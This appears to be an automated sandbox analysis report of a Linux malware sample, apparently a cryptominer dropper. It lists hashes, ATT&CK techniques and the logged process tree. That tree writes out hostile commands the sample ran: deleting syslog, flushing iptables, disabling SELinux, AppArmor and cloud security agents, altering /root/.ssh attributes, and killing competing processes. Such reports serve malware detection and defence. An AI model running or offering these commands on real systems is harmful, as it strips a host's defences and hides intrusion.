e1d7014b84618cd7fbf94439c78fe7d67f351cbc5536885fa3d94ea15325d83b

Analysis

max time kernel
13s
max time network
2s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
15-09-2024 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
Size

64KB
MD5

e18e805087ea6f63cf907907dc1d0a08
SHA1

ebe527ca26f78e5d347f22f323ee3f11d58cd57a
SHA256

e1d7014b84618cd7fbf94439c78fe7d67f351cbc5536885fa3d94ea15325d83b
SHA512

92115775959fa27619200334a0add1a448440ae5512aded7bd55937fec1daa0964d54f2e0f881b61515270f5bb783c9d2ab5096fd452529b8af633bff0938784
SSDEEP

768:57kFIBuFkc2zq0xvMGd5QP5ez4Z88mqKWCgpK8d7Cuaxz5st3P/hpE90550RQKIR:KF2Lc2Xnd5QhK8dmtq7b50BIR

Score

7^/10

defense_evasion discovery evasion privilege_escalation

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
672	iptables

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
680	sudo

Attempts to change immutable files 28 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
800	xargs
807	xargs
821	xargs
828	xargs
864	xargs
878	xargs
745	xargs
750	xargs
855	xargs
693	chattr
849	xargs
691	chattr
700	grep
758	xargs
835	xargs
729	xargs
734	xargs
871	xargs
772	xargs
664	chattr
705	grep
786	xargs
793	xargs
779	xargs
814	xargs
842	xargs
667	chattr
765	xargs

Disables AppArmor 16 IoCs

Disables AppArmor security module.

pid	Process
708	systemctl
708	systemctl
717	systemctl
717	systemctl
717	systemctl
708	systemctl
708	systemctl
708	systemctl
717	systemctl
717	systemctl
716	systemctl
724	systemctl
708	systemctl
720	systemctl
722	systemctl
717	systemctl

Disables SELinux 1 IoCs

Disables SELinux security module.

pid	Process
707	setenforce

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 9 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/660/status	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/43/cmdline	ps
File opened for reading	/proc/612/status	ps
File opened for reading	/proc/307/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/682/status	ps
File opened for reading	/proc/41/stat	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/658/cmdline	ps
File opened for reading	/proc/23/stat	ps
File opened for reading	/proc/145/status	ps
File opened for reading	/proc/43/cmdline	ps
File opened for reading	/proc/filesystems	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/666/stat	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/659/cmdline	ps
File opened for reading	/proc/874/status	ps
File opened for reading	/proc/316/status	ps
File opened for reading	/proc/682/status	ps
File opened for reading	/proc/703/cmdline	ps
File opened for reading	/proc/41/status	ps
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/614/stat	ps
File opened for reading	/proc/289/stat	ps
File opened for reading	/proc/145/status	ps
File opened for reading	/proc/659/status	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/594/status	ps
File opened for reading	/proc/173/stat	ps
File opened for reading	/proc/26/cmdline	ps
File opened for reading	/proc/659/stat	ps
File opened for reading	/proc/102/stat	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/659/cmdline	ps
File opened for reading	/proc/356/cmdline	ps
File opened for reading	/proc/307/stat	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/150/stat	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/22/cmdline	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/289/status	ps
File opened for reading	/proc/732/stat	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/316/status	ps
File opened for reading	/proc/20/stat	ps

/tmp/e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
/tmp/e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
1⤵
PID:660
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:662
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:664
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:667
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:672
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:680
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Reads CPU attributes
  PID:688
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:691
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:693
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:694
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:695
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:697
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:699
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:700
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:705
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:704
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:707
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:708
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:710
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:711
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:712
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:715
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:714
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:708
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:708
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:708
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:708
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:708
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:708
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:716
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:717
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:718
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:719
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:720
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:722
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:723
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:717
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:717
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:717
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:717
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:717
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:717
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:724
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:725
- /bin/grep
  grep -v grep
  2⤵
  PID:726
- /bin/grep
  grep aegis
  2⤵
  PID:727
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:728
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:729
- /bin/grep
  grep -v grep
  2⤵
  PID:731
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:730
- /bin/grep
  grep Yun
  2⤵
  PID:732
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:733
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:734
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:737
- /bin/mkdir
  mkdir /usr/share -p
  2⤵
  PID:738
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:742
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:743
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:744
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:745
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:747
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:749
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:750
- /bin/grep
  grep :443
  2⤵
  PID:754
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:755
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:756
- /bin/grep
  grep -v -
  2⤵
  PID:757
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:758
- /bin/grep
  grep :23
  2⤵
  PID:761
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:762
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:763
- /bin/grep
  grep -v -
  2⤵
  PID:764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:765
- /bin/grep
  grep :443
  2⤵
  PID:768
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:769
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:770
- /bin/grep
  grep -v -
  2⤵
  PID:771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:772
- /bin/grep
  grep :143
  2⤵
  PID:775
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:776
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:777
- /bin/grep
  grep -v -
  2⤵
  PID:778
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:779
- /bin/grep
  grep :2222
  2⤵
  PID:782
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:783
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:784
- /bin/grep
  grep -v -
  2⤵
  PID:785
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:786
- /bin/grep
  grep :3333
  2⤵
  PID:789
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:790
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:791
- /bin/grep
  grep -v -
  2⤵
  PID:792
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:793
- /bin/grep
  grep :3389
  2⤵
  PID:796
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:797
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:798
- /bin/grep
  grep -v -
  2⤵
  PID:799
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:800
- /bin/grep
  grep :5555
  2⤵
  PID:803
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:804
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:805
- /bin/grep
  grep -v -
  2⤵
  PID:806
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:807
- /bin/grep
  grep :6666
  2⤵
  PID:810
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:811
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:812
- /bin/grep
  grep -v -
  2⤵
  PID:813
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:814
- /bin/grep
  grep :6665
  2⤵
  PID:817
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:819
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:818
- /bin/grep
  grep -v -
  2⤵
  PID:820
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:821
- /bin/grep
  grep :6667
  2⤵
  PID:824
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:825
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:826
- /bin/grep
  grep -v -
  2⤵
  PID:827
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:828
- /bin/grep
  grep :7777
  2⤵
  PID:831
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:832
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:833
- /bin/grep
  grep -v -
  2⤵
  PID:834
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:835
- /bin/grep
  grep :8444
  2⤵
  PID:838
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:839
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:840
- /bin/grep
  grep -v -
  2⤵
  PID:841
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:842
- /bin/grep
  grep :3347
  2⤵
  PID:845
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:846
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:847
- /bin/grep
  grep -v -
  2⤵
  PID:848
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:849
- /bin/grep
  grep -v grep
  2⤵
  PID:852
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:851
- /bin/grep
  grep :3333
  2⤵
  PID:853
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:854
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:855
- /bin/grep
  grep -v grep
  2⤵
  PID:860
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:859
- /bin/grep
  grep :5555
  2⤵
  PID:861
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:862
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:864
- /bin/grep
  grep -v grep
  2⤵
  PID:868
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:867
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:869
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:870
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:871
- /bin/grep
  grep -v grep
  2⤵
  PID:875
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:874
- /bin/grep
  grep log_
  2⤵
  PID:876
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:877
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:878

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads